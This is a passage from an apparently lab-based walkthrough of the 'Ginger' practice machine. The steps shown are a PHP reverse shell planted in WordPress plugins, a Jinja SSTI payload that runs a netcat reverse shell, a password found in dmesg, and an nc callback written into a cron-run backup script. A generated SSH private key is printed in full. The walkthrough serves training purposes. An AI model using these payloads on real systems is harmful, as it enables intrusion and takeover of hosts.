src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619101602988\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Then, while experimenting, I accidentally used the earlier plugin whose code I had modified and which had then disappeared, and the reverse shell came back successfully:<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.10.104\/wordpress\/wp-content\/plugins\/akismet\/akismet.php\n# \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n# \u2514\u2500$ find wordpress\/ -name 
hello.php 2&gt;\/dev\/null\n# wordpress\/wp-content\/plugins\/hello.php<\/code><\/pre>\n<p>If you insist on uploading a vulnerable plugin, be sure to pick an older vulnerability... compatibility is better. This target machine dates from 2021, so it is best to find something from before then, and something small.<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300882.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300882.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619102655680\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h3>Addendum<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@ginger:\/$ pwd                              \n\/\n(remote) www-data@ginger:\/$ cd ~\n(remote) www-data@ginger:\/var\/www$ cd html\n(remote) www-data@ginger:\/var\/www\/html$ cd \/wordpress\/wp-content\/plugins\/\nbash: cd: \/wordpress\/wp-content\/plugins\/: No such file or directory\n(remote) www-data@ginger:\/var\/www\/html$ cd wordpress\/wp-content\/plugins\/\n(remote) www-data@ginger:\/var\/www\/html\/wordpress\/wp-content\/plugins$ ls -la\ntotal 32\ndrwxr-xr-x 6 www-data www-data 4096 Jun 19 04:14 .\ndrwxr-xr-x 6 www-data www-data 4096 Jun 19 04:22 ..\ndrwxr-xr-x 4 www-data www-data 4096 May 13  2021 akismet\ndrwxr-xr-x 7 www-data www-data 4096 Jun 19 04:14 canto\ndrwxr-xr-x 7 www-data www-data 4096 Jun  2  2021 
cp-multi-view-calendar\ndrwxr-xr-x 2 www-data www-data 4096 Jun 19 03:53 hello-dolly-master\n-rw-r--r-- 1 www-data www-data 2578 Mar 18  2019 hello.php\n-rw-r--r-- 1 www-data www-data   28 Jun  5  2014 index.php\n(remote) www-data@ginger:\/var\/www\/html\/wordpress\/wp-content\/plugins$ cd hello-dolly-master\/\n(remote) www-data@ginger:\/var\/www\/html\/wordpress\/wp-content\/plugins\/hello-dolly-master$ ls -la\ntotal 20\ndrwxr-xr-x 2 www-data www-data 4096 Jun 19 03:53 .\ndrwxr-xr-x 6 www-data www-data 4096 Jun 19 04:14 ..\n-rw-r--r-- 1 www-data www-data 2261 Jun 19 03:53 hello.php\n-rw-r--r-- 1 www-data www-data  564 Jun 19 03:53 readme.txt\n-rw-r--r-- 1 www-data www-data 3911 Jun 19 03:53 rev.php\n(remote) www-data@ginger:\/var\/www\/html\/wordpress\/wp-content\/plugins\/hello-dolly-master$ head rev.php \n\n  &lt;?php\n  \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n  \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n  set_time_limit (0);\n  $VERSION = &quot;1.0&quot;;\n  $ip = &#039;192.168.10.107&#039;;  \/\/ You have changed this\n  $port = 1234;  \/\/ And this\n  $chunk_size = 1400;<\/code><\/pre>\n<p>This means my earlier approach of slipping the shell into an open-source project also works!<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.10.104\/\/wordpress\/wp-content\/plugins\/hello-dolly-master\/rev.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300883.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300883.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619103053387\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@ginger:\/$ sudo -l\nMatching Defaults entries for www-data on ginger:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser www-data may run the following commands on ginger:\n    (ALL : ALL) NOPASSWD: \/usr\/bin\/sl<\/code><\/pre>\n<p>Running it makes a train run across the screen:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300884.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300884.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619103151120\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">(remote) www-data@ginger:\/$ file \/usr\/bin\/sl\n\/usr\/bin\/sl: setuid, setgid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 3.2.0, BuildID[sha1]=ef67270a275b66decf5098e74f47a99d35de9803, stripped<\/code><\/pre>\n<p>Hmm...<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300885.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300885.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619103445836\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>I found nothing exploitable here, so check whether the file size has been changed:<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@ginger:\/$ whereis sl\nsl: \/usr\/bin\/sl \/usr\/games\/sl \/usr\/share\/man\/man6\/sl.6.gz\n(remote) www-data@ginger:\/$ md5sum \/usr\/games\/sl\nabafee153cc4f440b7e5bd5b67c06174  \/usr\/games\/sl\n(remote) www-data@ginger:\/$ md5sum \/usr\/bin\/sl\nabafee153cc4f440b7e5bd5b67c06174  \/usr\/bin\/sl<\/code><\/pre>\n<p>This is probably a rabbit hole, put there to trap people...<\/p>\n<h3>Getting Information from dmesg<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@ginger:\/$ cat \/etc\/passwd | grep sh | cut -d: -f1\nroot\nsshd\nsabrina\nwebmaster\ncaroline\n(remote) www-data@ginger:\/$ ls -la \/home\/\ntotal 20\ndrwxr-xr-x  5 root      root      4096 May 21  2021 .\ndrwxr-xr-x 18 root      root      4096 May 19  2021 ..\ndrwxr-xr--  5 caroline  webmaster 4096 May 25  2021 caroline\ndrwxr-xr-x  4 sabrina   sabrina   4096 May 25  2021 sabrina\ndrwx------  4 webmaster webmaster 4096 May 25  2021 webmaster<\/code><\/pre>\n<p>Then take a look at the user directories:<\/p>\n<pre><code class=\"language-bash\">(remote) 
www-data@ginger:\/home$ cd sabrina\/\n(remote) www-data@ginger:\/home\/sabrina$ ls -la\ntotal 212\ndrwxr-xr-x 4 sabrina sabrina   4096 May 25  2021 .\ndrwxr-xr-x 5 root    root      4096 May 21  2021 ..\nlrwxrwxrwx 1 root    root         9 May 25  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 sabrina sabrina    220 May 19  2021 .bash_logout\n-rw-r--r-- 1 sabrina sabrina   3557 May 21  2021 .bashrc\ndrwx------ 3 sabrina sabrina   4096 May 21  2021 .gnupg\ndrwxr-xr-x 3 sabrina sabrina   4096 May 21  2021 .local\n-rw-r--r-- 1 sabrina sabrina    837 May 21  2021 .profile\n-rw-r--r-- 1 sabrina sabrina     66 May 21  2021 .selected_editor\n-rw-r--r-- 1 sabrina sabrina 177674 May 21  2021 image.jpg\n-rw-r--r-- 1 sabrina sabrina    143 May 21  2021 password.txt\n(remote) www-data@ginger:\/home\/sabrina$ cat password.txt\nI forgot my password again...\nI wrote it down somewhere in this form: sabrina:password\nbut I don&#039;t know where... I have to search in my memory<\/code><\/pre>\n<blockquote>\n<p>The <em>dmesg command<\/em> is used to examine and control the kernel ring buffer.<\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">(remote) www-data@ginger:\/home\/sabrina$ dmesg\n-------------------\n[   12.690831] IPv6: ADDRCONF(NETDEV_UP): enp0s3: link is not ready\n[   12.690842] IPv6: ADDRCONF(NETDEV_CHANGE): enp0s3: link becomes ready\n[   15.710708] sabrina:dontforgetyourpasswordbitch<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300886.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300886.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619104900587\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>SSTI Privilege Escalation<\/h3>\n<pre><code class=\"language-bash\">sabrina@ginger:~$ sudo -l\nMatching Defaults entries for sabrina on ginger:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser sabrina may run the following commands on ginger:\n    (webmaster) NOPASSWD: \/usr\/bin\/python \/opt\/app.py *\nsabrina@ginger:~$ cat \/opt\/app.py\n\nfrom flask import Flask, request, render_template_string,render_template\n\napp = Flask(__name__)\n@app.route(&#039;\/&#039;)\ndef hello_ssti():\n    person = {&#039;name&#039;:&quot;world&quot;,&#039;secret&#039;:&quot;UGhldmJoZj8gYWl2ZnZoei5wYnovcG5lcnJlZg==&quot;}\n    if request.args.get(&#039;name&#039;):\n        person[&#039;name&#039;] = request.args.get(&#039;name&#039;)\n    template = &#039;&#039;&#039;&lt;h2&gt;Hello %s!&lt;\/h2&gt;&#039;&#039;&#039; % person[&#039;name&#039;]\n    return render_template_string(template,person=person)\ndef get_user_file(f_name):\n    with open(f_name) as f:\n        return f.readlines()\napp.jinja_env.globals[&#039;get_user_file&#039;] = get_user_file\n\nif __name__ == &quot;__main__&quot;:\n    app.run(debug=True)\n\nsabrina@ginger:~$ echo &#039;UGhldmJoZj8gYWl2ZnZoei5wYnovcG5lcnJlZg==&#039; | base64 -d\nPhevbhf? 
aivfvhz.pbz\/pnerref<\/code><\/pre>\n<p>Judging by the function name, this is probably testing <code>SSTI<\/code>:<\/p>\n<blockquote>\n<p>For reference: <a href=\"https:\/\/github.com\/swisskyrepo\/PayloadsAllTheThings\/blob\/master\/Server%20Side%20Template%20Injection\/Python.md\">https:\/\/github.com\/swisskyrepo\/PayloadsAllTheThings\/blob\/master\/Server%20Side%20Template%20Injection\/Python.md<\/a><\/p>\n<\/blockquote>\n<p>Try to get it to execute commands:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300887.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300887.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619105627654\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>I tried opening another terminal to test locally, but:<\/p>\n<pre><code class=\"language-bash\">sabrina@ginger:~$ cd \/tmp\nsabrina@ginger:\/tmp$ curl http:\/\/127.0.0.1:5000\/\n-bash: curl: command not found<\/code><\/pre>\n<p>Use <code>ssh<\/code> to forward the relevant port:<\/p>\n<pre><code class=\"language-bash\">ssh -L 5000:127.0.0.1:5000 sabrina@$IP<\/code><\/pre>\n<p>Check whether it is open:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ curl -s http:\/\/127.0.0.1:5000\n&lt;h2&gt;Hello world!&lt;\/h2&gt; 
<\/code><\/pre>\n<p>Continue testing:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ curl -s &quot;http:\/\/127.0.0.1:5000\/?name=aaaa&quot;\n&lt;h2&gt;Hello aaaa!&lt;\/h2&gt;                                                                                                                                                                                             \n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ curl -s &quot;http:\/\/127.0.0.1:5000\/?name=\\{\\{7*7\\}\\}&quot;\n&lt;h2&gt;Hello 49!&lt;\/h2&gt;<\/code><\/pre>\n<p>Sure enough, there is an <code>SSTI<\/code> vulnerability; try executing a command:<\/p>\n<pre><code>http:\/\/127.0.0.1:5000\/?name={{ self.__init__.__globals__.__builtins__.__import__(&quot;os&quot;).popen(&quot;whoami&quot;).read() }}<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300888.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300888.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619111434501\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ curl -s -G &#039;http:\/\/127.0.0.1:5000\/&#039; --data-urlencode &#039;name={{ self.__init__.__globals__.__builtins__.__import__(&quot;os&quot;).popen(&quot;whoami&quot;).read() }}&#039; | html2text\n***** Hello webmaster ! 
*****<\/code><\/pre>\n<p>Try a reverse shell!!!<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Ginger]\n\u2514\u2500$ curl -s -G &#039;http:\/\/127.0.0.1:5000\/&#039; --data-urlencode &#039;name={{ self.__init__.__globals__.__builtins__.__import__(&quot;os&quot;).popen(&quot;nc -e \/bin\/bash 192.168.10.107 2345&quot;).read() }}&#039; | html2text<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300889.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300889.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619112014443\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>Escalating to caroline<\/h3>\n<pre><code class=\"language-bash\">(remote) webmaster@ginger:\/home\/caroline$ ls -la\ntotal 40\ndrwxr-xr-- 5 caroline webmaster 4096 May 25  2021 .\ndrwxr-xr-x 5 root     root      4096 May 21  2021 ..\ndrwxrwx--- 2 caroline webmaster 4096 May 22  2021 backup\nlrwxrwxrwx 1 root     root         9 May 25  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 caroline caroline   220 May 21  2021 .bash_logout\n-rw-r--r-- 1 caroline caroline  3526 May 21  2021 .bashrc\ndrwx------ 3 caroline caroline  4096 May 22  2021 .gnupg\ndrwxr-xr-x 3 caroline caroline  4096 May 21  2021 .local\n-rw-r--r-- 1 caroline caroline   807 May 21  2021 .profile\n-rw-r--r-- 1 caroline caroline    66 May 21  2021 .selected_editor\n-rwx------ 1 caroline caroline    33 May 22  2021 
user.txt\n(remote) webmaster@ginger:\/home\/caroline$ cd backup\/\n(remote) webmaster@ginger:\/home\/caroline\/backup$ ls -la\ntotal 12\ndrwxrwx--- 2 caroline webmaster 4096 May 22  2021 .\ndrwxr-xr-- 5 caroline webmaster 4096 May 25  2021 ..\n-rwxr-xr-x 1 caroline caroline    44 May 21  2021 backup.sh\n(remote) webmaster@ginger:\/home\/caroline\/backup$ cat backup.sh \n#!\/bin\/bash\n\/usr\/bin\/cp -r \/home\/caroline\/*<\/code><\/pre>\n<p>At a blind guess, a script like this is run on a schedule, so try to exploit it. First add a <code>.ssh<\/code> directory to log in with, to avoid tying up too many terminals.<\/p>\n<pre><code class=\"language-bash\">(remote) webmaster@ginger:\/home\/webmaster$ mkdir .ssh\n(remote) webmaster@ginger:\/home\/webmaster$ chmod 700 .ssh\n(remote) webmaster@ginger:\/home\/webmaster$ cd .ssh\n(remote) webmaster@ginger:\/home\/webmaster\/.ssh$ ssh-keygen -t rsa -o\nGenerating public\/private rsa key pair.\nEnter file in which to save the key (\/home\/webmaster\/.ssh\/id_rsa): \nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in \/home\/webmaster\/.ssh\/id_rsa.\nYour public key has been saved in \/home\/webmaster\/.ssh\/id_rsa.pub.\nThe key fingerprint is:\nSHA256:pVeSHFJOvE1MgHi4koodE\/FcAEooDYECi69sebF8BaU webmaster@ginger\nThe key&#039;s randomart image is:\n+---[RSA 2048]----+\n|B=oo...+.+=+.    |\n|Booo .= o=.oo    |\n|*  .oE o  *+.    |\n| .o o o  o.o.    |\n| o.= . .S .      |\n|o.= o .  .       |\n|.+ + .           |\n|. . .            
|\n|                 |\n+----[SHA256]-----+\n(remote) webmaster@ginger:\/home\/webmaster\/.ssh$ cat id_rsa\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEA3VIGvpOCZ7rc9hIrtFwrX8GDD4JlCZMAOKpGW5mL8rAXuDV23Pfi\nb9566akoUs14EnzTxgRwqCILck3PzmEcioihK4YYNW3GmhzjTbwqE9Ydplu47\/MsGvLS8n\ncAHuIH\/S0Vh\/tR8JR5TiIwpL3vCZKRKSw2HASWC9Xlj\/Ir5f20+xtTU26mBOCjJR1vJXWN\nLi0p7oLZN7o6cUTmkGpXsvX0VWOfwA42Hl0N\/odV81Z6z3eCjZKVKsek6nCB1aJCfloQAk\n+V7v\/xWTuUsRc\/6cCK0cGHghAEI71xU0IGT486uhSTx4EyXduriTj\/YO2cT\/OkkeRG6aLM\nCbV3L7hYPwAAA8iKss6birLOmwAAAAdzc2gtcnNhAAABAQDdUga+k4Jnutz2Eiu0XCtfwY\nMPgmUJkwA4qkZbmYvysBe4NXbc9+Jv3nrpqShSzXgSfNPGBHCoIgtyTc\/OYRyKiKErhhg1\nbcaaHONNvCoT1h2mW7jv8ywa8tLydwAe4gf9LRWH+1HwlHlOIjCkve8JkpEpLDYcBJYL1e\nWP8ivl\/bT7G1NTbqYE4KMlHW8ldY0uLSnugtk3ujpxROaQaley9fRVY5\/ADjYeXQ3+h1Xz\nVnrPd4KNkpUqx6TqcIHVokJ+WhACT5Xu\/\/FZO5SxFz\/pwIrRwYeCEAQjvXFTQgZPjzq6FJ\nPHgTJd26uJOP9g7ZxP86SR5EbposwJtXcvuFg\/AAAAAwEAAQAAAQEAxFqh4TK934nJwAce\n\/0VGtg3ZWUk2mufwqlVnVp1DrGzOnn\/QlPrXyqh4JBYP0Ga6wKw+ts\/5ozGRNjgSxecii0\nXst9CgacabDN\/USoNGUZMFezKlQT1dRAtrW\/J4CO5AaD43fA1dBTS06r0qqv5XtQZ0AzNW\nTkVDWfzLTopsp\/5oeDZEfEJxMcqH8D+plcH7GwJ5+IsC2UeNo\/DFkgeDWA8V0oOZcjWtwC\nMxUt0NXEbpZ2fpw0IHUzozwnIniDEuuQMF1Cnb+\/4JHtvo2WvhgQ5zYl7c5vF2bgQypcCr\njrDT\/5T4IopF+JlmW\/gEhnuYtGeOVm7P\/AJDaCtA4gMJAQAAAIBx5BNaWJB3xWmdJRUEgw\nvP0bJ3XDSsDcShCd8tJkCho1ROWbR0kOwpaDIKR0+NDMipDxr6K4GuVcANzQsTPJ0RMIZ4\nORwGPh4tfT6iTdaqL93cW5Q+6\/IcTMW1gskgweiQIpNStdBWrMGoaaZxuWzWW\/X4Jn8PQs\ngf86tfPQZHUwAAAIEA+CbZwq58xDTgJSHspKXjGCoC29fS3hUT3QjbllZhH+ZvXB5b7Oek\nLixIH7u2H1Tqp7mpWPhN99Y6Gy7TCJyC2sj0AgdGhxUfzia4ZikImHkAfFrFQc5tlk4lrA\nhFXTQaDzJYJGkltOnQkNtsAUuViPxi6nBFcFzOy6HiPwNd5KUAAACBAORR79zI+4tbXM3H\ns2y2C9TV9qV2nNcMV9uYmnFS6ozmOk+mFOPHlNy8m\/gGu\/APv+lshK6tKuz7OIy004guup\nEV+N5l5yxFiwQ2\/7Ir0qgWgmWaRNWq1gHF1i7G4vEtFcZMPYc3dfCwoSiIeLy3XmtQLsuc\nWX29ox1iH\/cp8OATAAAAEHdlYm1hc3RlckBnaW5nZXIBAg==\n-----END OPENSSH PRIVATE KEY-----\n(remote) 
webmaster@ginger:\/home\/webmaster\/.ssh$ cp id_rsa.pub authorized_keys\n(remote) webmaster@ginger:\/home\/webmaster\/.ssh$ ls -la\ntotal 20\ndrwx------ 2 webmaster webmaster 4096 Jun 19 06:25 .\ndrwx------ 5 webmaster webmaster 4096 Jun 19 06:25 ..\n-rw-r--r-- 1 webmaster webmaster  398 Jun 19 06:25 authorized_keys\n-rw------- 1 webmaster webmaster 1823 Jun 19 06:25 id_rsa\n-rw-r--r-- 1 webmaster webmaster  398 Jun 19 06:25 id_rsa.pub<\/code><\/pre>\n<p>Try connecting over ssh:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300890.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300890.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250619122739403\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Now the other terminals can be disconnected and the work continued from here!<\/p>\n<pre><code class=\"language-bash\">webmaster@ginger:\/home\/caroline\/backup$ echo &#039;nc -e \/bin\/bash 192.168.10.107 3456&#039; &gt; \/tmp\/backup.sh\nwebmaster@ginger:\/home\/caroline\/backup$ rm backup.sh \nrm: remove write-protected regular file &#039;backup.sh&#039;? 
y\nwebmaster@ginger:\/home\/caroline\/backup$ cp \/tmp\/backup.sh .\/backup.sh\nwebmaster@ginger:\/home\/caroline\/backup$ ls -la\ntotal 12\ndrwxrwx--- 2 caroline  webmaster 4096 Jun 19 06:32 .\ndrwxr-xr-- 5 caroline  webmaster 4096 May 25  2021 ..\n-rw-r--r-- 1 webmaster webmaster   36 Jun 19 06:32 backup.sh\nwebmaster@ginger:\/home\/caroline\/backup$ chmod +x backup.sh<\/code><\/pre>\n<p>Sure enough, the shell came back on the other side:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506191300891.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 